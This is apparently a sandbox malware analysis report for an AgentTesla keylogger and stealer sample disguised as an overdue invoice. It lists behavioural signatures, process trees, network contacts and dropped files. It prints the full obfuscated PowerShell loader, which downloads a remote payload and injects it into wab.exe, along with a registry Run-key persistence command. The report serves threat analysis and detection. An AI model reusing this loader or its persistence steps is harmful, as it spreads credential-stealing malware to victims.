Malware Analysis Report

2024-11-15 06:40

Sample ID 240603-k9swsabb67
Target overdue_invoice.ace
SHA256 5bda2e2623e9c30c9571c974005206a3ebd4e66009069f0105597a9449ff7c57
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5bda2e2623e9c30c9571c974005206a3ebd4e66009069f0105597a9449ff7c57

Threat Level: Known bad

The file overdue_invoice.ace was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 09:18

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 09:18

Reported

2024-06-03 09:20

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4980 set thread context of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4168 wrote to memory of 4456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4168 wrote to memory of 4456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 2628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4456 wrote to memory of 2628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4456 wrote to memory of 4980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 2068 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 2068 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 2068 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4980 wrote to memory of 5016 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 5016 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5016 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5016 wrote to memory of 764 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 764 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 764 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 98.58.21.103.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/4456-0-0x00007FFC72C73000-0x00007FFC72C75000-memory.dmp

memory/4456-1-0x000001CF56080000-0x000001CF560A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4issik1.lhn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4456-11-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/4456-12-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/4980-15-0x0000000004DA0000-0x0000000004DD6000-memory.dmp

memory/4980-16-0x00000000054E0000-0x0000000005B08000-memory.dmp

memory/4980-17-0x00000000054A0000-0x00000000054C2000-memory.dmp

memory/4980-18-0x0000000005C80000-0x0000000005CE6000-memory.dmp

memory/4980-19-0x0000000005CF0000-0x0000000005D56000-memory.dmp

memory/4980-29-0x0000000005E80000-0x00000000061D4000-memory.dmp

memory/4980-30-0x0000000006350000-0x000000000636E000-memory.dmp

memory/4980-31-0x0000000006390000-0x00000000063DC000-memory.dmp

memory/4980-32-0x0000000007CF0000-0x000000000836A000-memory.dmp

memory/4980-33-0x00000000074A0000-0x00000000074BA000-memory.dmp

memory/4980-34-0x0000000007670000-0x0000000007706000-memory.dmp

memory/4980-35-0x00000000075C0000-0x00000000075E2000-memory.dmp

memory/4980-36-0x0000000008370000-0x0000000008914000-memory.dmp

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/4980-38-0x0000000008920000-0x000000000C57C000-memory.dmp

memory/4456-39-0x00007FFC72C73000-0x00007FFC72C75000-memory.dmp

memory/4456-40-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/5016-46-0x0000000001200000-0x0000000001240000-memory.dmp

memory/5016-45-0x0000000001200000-0x0000000002454000-memory.dmp

